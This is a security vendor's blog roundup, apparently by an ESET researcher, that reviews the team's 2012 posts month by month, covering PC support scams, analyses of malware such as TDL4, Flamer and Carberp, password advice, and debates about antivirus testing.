Inevitably, the run-up to Valentine’s Day saw lots of malicious activity, and Stephen addressed the problem comprehensively in Cookie-stuffing click-jackers rip off Victoria’s Secret Valentine’s giftcard seekers. I got the opportunity to talk to senior police officers in the UK about those PC support scams that I’ve been banging on about since before Columbus sailed the blue: Cybercrime and Punishment, and also Cybercrime, Cyberpolicing, and the Public. I also looked at some data from a survey conducted by Amárach Research on behalf of ESET Ireland, as blogged by Urban Schrott: Your Children and Online Safety, ESET North America CEO Andrew Lee returned to the topic of intellectual property, piracy and legislation: ACTA and TPP: The wrong approach to intellectual property protection.  Aryeh Goretsky took a long hard look at Windows Phone 8: Security Heaven or Hell?

On the technical analysis front, Aleksandr Matrosov and Eugene Rodionov shared some more research with us on Olmarik/TDL4: TDL4 reloaded: Purple Haze all in my brain. And Righard Zwienenberg, fresh to ESET but with many, many years in the security industry already, looked at Password management for non-obvious accounts.

Cameron kicked us off in March with a series of reports from the huge RSA conference in San Francisco, and Stephen followed up in Information Security Disconnect: RSA, USB, AV, and reality. Several security gurus at RSA who should really have known better told Wired that they don’t use antivirus and strongly implied that no-one else should either: I responded to that in Security professionals DO use anti-virus. Stephen made available the excellent Malware Inc. presentation that he made at RSA – Changing how people see the malware threat: images can make a difference – and offered an infographic exploring all the data Google could, potentially exploit: Google’s data mining bonanza and your privacy: an infographic. He also considered the issues around employers requiring access to employee Facebook accounts and the spring crop of IRS-related scams: Facebook logins toxic for employers, violate security and privacy principles and Spring Brings Tax-related Scams, Spams, Phish, Malware, and the IRS.

On the more technical front, Righard shared a few surprises with us after he installed Skype onto a new laptop: SKYPE: (S)ecurely (K)eep (Y)our (P)ersonal (E)-communications, followed up with some analysis of Android’s locking mechanism that gave me a useful reference for my EICAR presentation in May on PIN Holes: Passcode Selection Strategies, and then looked at Win32/Georbot in From Georgia With Love: Win32/Georbot information stealing trojan and botnet. ESET Canada allowed me access to some of their research so that I was able to sound as if I might know what I was talking about in Kelihos: not Alien Resurrection, more Attack of the Clones. In Modern viral propagation: Facebook, shocking videos, browser plugins, Robert Lipovsky looked in some depth at scam propagation techniques, and in Vulnerable WordPress Leads to Security Blog Infection he looked at Javascript infectors. I looked in depth at some more of the techniques used by support scammers – Support Scammers (mis)using INF and PREFETCH and Fake Support, And Now Fake Product Support, and our Russian colleagues shared lots of information on Blackhole, CVE-2012-0507 and Carberp. And Alexis Dorais-Joncas delved into the murky world of Mac malware: OSX/Imuler updated: still a threat on Mac OS X, and OSX/Lamadai.A: The Mac Payload.

In April the questions of quasi-testing and the usefulness (or not) of anti-virus came up again. I finally posted a paper on the topic with Julio Canto of VirusTotal and engaged in a debate of sorts in SC Magazine: VirusTotal, Useful Engines, and Useful AV, and, along with Andrew Lee, tried to introduce a note of sanity into the ‘AV isn’t worth paying for’ debate: Free Anti-virus: Worth Every Penny? So that’s sorted that question? Unfortunately not: in December (see below) the same fallacies came up all over again.

Aleksandr looked at a hot-off-the-press exploit kit technique: Exploit Kit plays with smart redirection (amended), and in Phishing Using HTML and Intranet Security Settings Righard dug deep into a rather novel approach to phishing – Phishing Using HTML and Intranet Security Settings – and gave some good advice following the deferment of the FBI’s shutdown of servers maintained following the takedown of DNSchanger botnets: DNS Changer (re)lived, new deadline: 9 July 2012!

Stephen introduced another very popular infographic, this time on the Bring Your Own Device: BYOD Infographic: For security it’s not a pretty picture. A topic most of us have been asked about or written about many times this year, in blogs, conferences and interviews. He also looked at the legal imperatives that make establishing a WISP (Written Information Security Program) a good idea, Java, Macs and Flashbacks, and took a long hard look at QR Codes and NFC Chips: Preview-and-authorize should be default.

Alexis Dorais-Joncas and Pierre-Marc Bureau both wrote about OSX/Malware (yes, Virginia, there is such a thing), Cameron wrote about Pinterest, and asked Could your next new car be hacked (should you be scared)? And I wrote about PC support scams. Quelle surprise. But maybe it’s never a waste of time to show people How to recognize a PC support scam.

On May 1st I thought about going Morris dancing but instead I wrote about a support scam poll on behalf of the Internet Storm Center.  For someone who stopped working the helpdesk in 2001, there seem to be an awful lot of support issues in my life.  Since I spent most of the month at EICAR, CARO (Aleksandr blogged about his presentation there) and AMTSO, AMTSO in particular rather dominated my writing and even got me an unexpected interview with Infosecurity Magazine. I did have one moment of old-time AV nostalgia, though: Win32/Flamer: the 21st Century Whale.

Stephen had good advice for travellers (thanks, Stephen: came in very useful!) in 11 Tips for protecting your data when you travel and Foreign Travel Malware Threat Alert: Watch out for hotel Internet connections. For stay-at-home, virtual travellers he had more advice in How to stop Twitter tracking you and keep private the websites you visit and made available a video giving the bad guy’s view of a remote access Trojan: Malware RATs can steal your data and your money, your privacy too.

Aryeh posted about a new approach to cruise/vacation property scams: Press One if by LAN, Two if by Sea…  And Cameron posted on SMSmishing (SMS Text Phishing) – how to spot and avoid scams, Millions have not reviewed Facebook privacy settings: Here’s how, and DNSChanger ‘temporary’ DNS servers go dark soon: is your computer really fixed?

In June, Stuxnet and its siblings (or offspring) became a big issue (again): not only because of the fuss about Flamer, but because it suddenly seemed that the US government was claiming part of the credit for Stuxnet, at least. Stephen spoke for us all when he said Stuxnet, Flamer, Flame, Whatever Name: There’s just no good malware, and made more good points on The negative impact on GDP of state-sponsored malware like Stuxnet and Flame . He provided more travel advice in Data security and digital privacy on the road, what travelers should know but while the holiday season was just getting into its swing in the Northern hemisphere, he warned that Back to school scams? They may be just around the corner, and advised on how to spot them.

Aryeh, meanwhile, was beset by scams in SMSmishing Unabated: Best Buy targeted by fake gift card campaign and Close Call with a Caribbean Cruise Line Scam. He seems to have become inextricably entangled with cruise scams in the same way that I have with support scams. We both had something to say on the perennial topic of passwords and PINs: Guarding against password reset attacks with pen and paper and Passwords and PINs: the worst choices. But I did manage to get a little time out in Slovenia (and got very sunburnt in Venice), though I was basically there for a conference at the behest of Urban Schrott, of ESET Ireland.

Cameron was mainly focused on social networking, from Google to LinkedIn to Facebook (Your Facebook account will be terminated – again and Facebook policy changes – does the ‘crowd’ really have a seat at the table?). He still found time to indulge his passion for automotive security, though: How much will your driverless car know about you (and who will it tell)?

On the technical analysis side, Jean-Ian Boutin looked at Win32/Gataka and Robert Lipovsky and Righard Zwienenberg both looked at ACAD/Medre. Meanwhile, Aleksandr Matrosov and I both talked about the ZeroAccess rootkit, while Aleks noted some interesting data around CVE2012-1889: MSXML use-after-free vulnerability.

In July, Aryeh blogged about .ASIA Domain Name Scams Still Going Strong instead of cruise line scams and I blogged a couple of times about support scam gambits. Ho, hum. Peter Stancik and myself addressed in several blogs the issue of the final deadline for the turning off of the FBI’s servers substituting for the DNSChanger servers. If there’s anyone out still out there who doesn’t have Internet access any more, I don’t think you can blame us.

Righard found some Scareware on the Piggy-Back of ACAD/Medre.A. Aleks blogged about Flame and its siblings and predecessors, updates to the Rovnix framework, Java exploitation, and legal assaults on the Carberp botnet (yay!).

There were more issues with passwords that Stephen and I couldn’t resist blogging about: Passwords of Plenty*: what 442773 leaked Yahoo! accounts can tell us and Password Party Weekend? Millions exposed now include Phandroid, Nvidia, me. Stephen also commented on an Instagram vulnerability. Cameron blogged his socks off about BlackHat, Defcon, Free YouTube .mp3 converters – with a free malware bonus, and Gamigo game site hack – lessons learned (and what should you do), and UK journalist Kevin Townsend turned my thoughts to Rakshasha, Hindu demon and allegedly permanent and undetectable backdoor. I think not.

August was a little quieter, and Aleks led off with Flamer Analysis: Framework Reconstruction, while Eugene Rodionov, whose work with Aleks has informed so much of the analysis we’ve blogged on here, highlighted the Interconnection of Gauss with Stuxnet, Duqu & Flame. Stephen dissected the way the Reveton ransomware snares its victims. Sébastien Duquette blogged a comprehensive analysis of a website selling access to a malware-distribution service. The guys responsible seem to have loved the publicity, but our filtering stopped them piggybacking the blog to get more custom. Come on guys, we’re not that dumb…

Robert Lipovsky blogged about Quervar – Induc.C reincarnate? and there was an unexpected intersection between technical analysis and support scams: Support scams and Quervar/Dorifel. In fact, there was a lot of action around support scams this month: AMMYY, whose remote access service is often misused by Indian scammers (in the US, it’s often referred to as the AMMYY scam), came up with some useful information and a warning, while one of the scammers who ring me with monotonous regularity provided a little light relief: Support Scammer Anna’s CLSID confusion. All good material for the presentations on the topic I’d be making at CFET and Virus Bulletin in September.

Cameron picked up on Mac OSX/iOS hacks at Blackhat – are scammers setting their sights?, Blizzard Entertainment hacking, and photo tagging on Facebook.  Stephen offered excellent advice: Java zero day = time to disable Java, in your browser at least. Cameron also blogged at some length about the FinFisher spyware and I took up the theme when one of our readers asked about ESET’s detection of the spyware (which we detect as Win32/Belasek.D): Finfisher and the Ethics of Detection.

While I’ve previously talked about the Top Umpteen bad choices of password, I got fed up with all the journalists simply listing over-used passwords as if all you have to do is not use the top 25 and you’re safe, and tried to adopt a more constructive approach: Bad password choices: don’t miss the point. However, one of my blogs that month came directly from a conversation with one of the more technically competent journalists working in security, The Register’s John Leyden: Carbon Dating and Malware Detection.

September was also fairly quiet in the run-up to the Virus Bulletin conference: like most of the anti-malware industry, we consider VB to be one of the most important events of the year, and as you’ll see from my summary of ESET’s papers and articles in 2012, we had a lot of presentations to prepare for. Righard and I also presented at a small but invariably interesting forensics conference at Canterbury, in the UK. While I was there, I grabbed an opportunistic photo on my phone that I was able to use almost immediately for a blog on ATM/cashpoint security: again, it derived from an article by a knowledgeable journalist specializing in computer security, the estimable Brian Krebs: ATM Security? Don’t bank on it.

Sadly, Pierre-Marc Bureau doesn’t often find time to contribute to the blog these days, but when he does, it’s always worth reading, and Dancing Penguins – A Case of Organized Android Pay Per Install was no exception. Aryeh also looked at Android security in The Dynamic Duo for Securing your Android: Common Sense and Security Software. And Pierre-Marc also summarized the state of (non-)play with OSX/Flashback in Flashback Wrap Up.

We came across the ‘first Irish virus’ which appears to have been non-viral ransomware with the message translated into (Irish) Gaelic (Gaeilge). Actually, thanks to researcher ‘Kafeine’ I subsequently got to see examples of other messages regionalized for other countries and languages. While this kind of malicious activity is no laughing matter, I did get some amusement out of the fact that one example inadvertently used some French text among the Gaeilge, and another apparently got confused between the .ir and .ie Top Level Domains and generated text in Iranian language apparently intended to target speakers of Gaeilge.

I also returned to the topic of PIN selection strategies, commenting on research from DataGenetics: Choosing a non-obvious PIN. Cameron wrote about Facebook timeline security & privacy: steps to keep your account & identity safe, and followed up with Facebook timeline privacy/security: protect your account and identity (2/2). And in a slightly unusual case of the source quoting the journalist(s) I cited conversations with and articles by Kevin Townsend, Dan Raywood, and John Leyden in a post on malware inserted into the supply chain: Nitol Botnet: You Will Never Break The Chain.

In October, Cameron blogged about a free Android app from ESET available from Google Play to protect Android devices from the USSD vulnerability: Free Android USSD vulnerability protection from ESET now on Google Play. Aryeh also shared some product information: W8ing for V6: What ESET has in store for Windows 8 Users. Stephen asked, given that October was National Cyber Security Awareness Month, whether How’s Your Cyber Security Awareness? Or, do we really need security training? (the answer was yes!) By way of follow-up he disclosed the results of a Harris Poll that found that Younger people less secure online than their elders new study suggests, and in Brutalized! South Carolina breach exposes data security woes at State level, observed that 86% of state CISOs identified “lack of sufficient funding” as the key barrier to addressing cybersecurity. He also picked up on concerns about threats inserted into the supply chain, this time with reference to government paranoia: Huawei? The how, what, and why of telecom supply chain threats.

Aleks contributed some typically detailed technical analysis Olmasco bootkit: next circle of TDL4 evolution (or not?). Stephen gave me a break from writing about support scams and blogged about how FTC cracks down on tech support scams and feds nail fake AV perps, though I couldn’t resist blogging a week or two later on why the problem isn’t going to disappear completely just yet: Telescammer Hell: What’s Still Driving The PC Support Scammers?  But of course several of us, as ever, were reporting on scams of one sort or another. Cameron warned us to Avoid Election Season Scams: Donations and cruises to avoid. I  talked about telephone scams that weren’t about telephone support scam –  Telephone Scams: it’s not all about PC support – and I finished off the month with an ambitious three-part blog on phishing (with some help from Urban Schrott) which is now available as a single paper.  I should probably emphasize that when I wrote about Malware and Medical Devices: hospitals really are unhealthy places… I had no prior knowledge of where the plot of Homeland series two was going (murder by remotely controlled pacemaker).  :)

November inevitably continued some similar themes. On the technical front, Jean-Ian Boutin looked at the latest developments concerning Win32/Gataka – or should we say Zutick? Pablo Ramos wrote two blogs on Android/TrojanSMS.Boxer.AA, one of them a deep-dive technical analysis and the other aimed at a more general audience: Don’t pay high phone bills: SMS Trojans can trick you via premium-rate numbers. This is an approach we’d like to make more use of, giving our less technical audience a view of why certain malicious technology has an impact on their online lives without boring them with programmatic esoterica, but doing so is something of a challenge for a small blogging team. Writing technical content that is relevant and interesting to the lay reader but still accurate is as demanding in its own way as heavily technical material. In Win32/Morto – Made in China, now with PE file infection, Pierre-Marc managed to find a balance between the two that appealed to a wide range of readers.

In Wauchos Warhorse rides again I looked at an interesting spike spotted by Stephen in UK detections of an elderly malware family. Statistical artifacts are interesting, but not always explicable. Aryeh is the team expert on Windows 8, but in Windows 8: there’s more to security than the Operating System I looked at the way current events (such as the release of Win8 and Hurricane Sandy become fodder for social engineering attacks, and in Premium Rate Scams and Hoaxes I looked at a very different aspect of Premium Rate misuse to that blogged by Pablo. In Support Scams and the Surveillance Society and New Support Scam Gambits: Frozen Virus a Frozen Turkey I looked at some new evolutions in PC support scamming. Stephen followed up his speculations on a new angle on data theft (Digital photos demand a second look as picture-stealing threat develops) with a very useful, very popular seasonal piece on Safer cyber-shopping makes for happier holidays: 12 simple safety tips.

At the time of writing, December is barely half-way through and already shaping up to be as eventful as any other month this year. There was another Mac-specific attack on Tibetan activists – Spying on Tibetan sympathisers and activists: Double Dockster – while Stephen returned to the vexatious topic of passwording in Password handling: challenges, costs, and current behavior (now with infographic). It’s frustrating that such a flawed and heavily exploited authentication technology still dominates our online lives.

Another security company tried to prove that money spent on anti-virus would be better spent on their own products with a poorly-conceived ‘test’ based on inappropriate use of the VirusTotal service. Righard pointed to some of the flaws in their logic in Why Anti-Virus is not a waste of money and I returned to the theme of misuse of VirusTotal (which I’d already addressed in a joint paper with VT’s Julio Canto) in one of my external (non-ESET) blogs.  (Some of us do a great deal of blogging and other writing outside ESET, far more than the list of papers and articles below indicates: it would be just too time-and-space-consuming to find and list everything we’ve written this year.)

The security industry suddenly woke up to the fact that despite Microsoft’s attempts to eradicate the misuse of the Autorun functionality in removable media, threats that use that vector continue to thrive. This wasn’t exactly news to us: INF/Autorun and its siblings have been dominating our threat reports all along. However, Stephen generated some interesting and useful new material on the topic in My Little Pronny: Autorun worms continue to turn and Are your USB flash drives an infectious malware delivery system?

I was overcome by nostalgia after receiving a 419 claiming to be from the wife of a former Nigerian Head of State: Maryam Abacha rides again: yes, Virginia, there IS a Sani-ty Clause!*. Ontinet’s Josep Albors directed my attention to the murky world of boiler room scams and alternative investment scams in Diamonds are forever, and so are investment scams. ESET Latin America offered their predictions for malware trends in 2013 in a paper announced by Sebastian Bortnik: Trends for 2013: astounding growth of mobile malware. Unsurprisingly, Android malware is prominently featured. Other ESET researchers looked into their own crystal balls a little later in the month.

Aleks updated ongoing research on the vulnerabilities in smartcard systems used for banking with news of Win32/Spy.Rambus. Pablo returned to the topic of Dorkbot, the subject of his paper at the Virus Bulletin conference. And Aryeh kicked off a highly seasonal series on securing those Christmas computing goodies. A lot of interest was generated by Pierre-Marc’s report of malicious activity in the Linux realm, which prompted talk of a “malicious Apache module” which then prompted a further post to clarify the implications of that phrase.

Follow

Get every new post delivered to your Inbox.

Join 66 other followers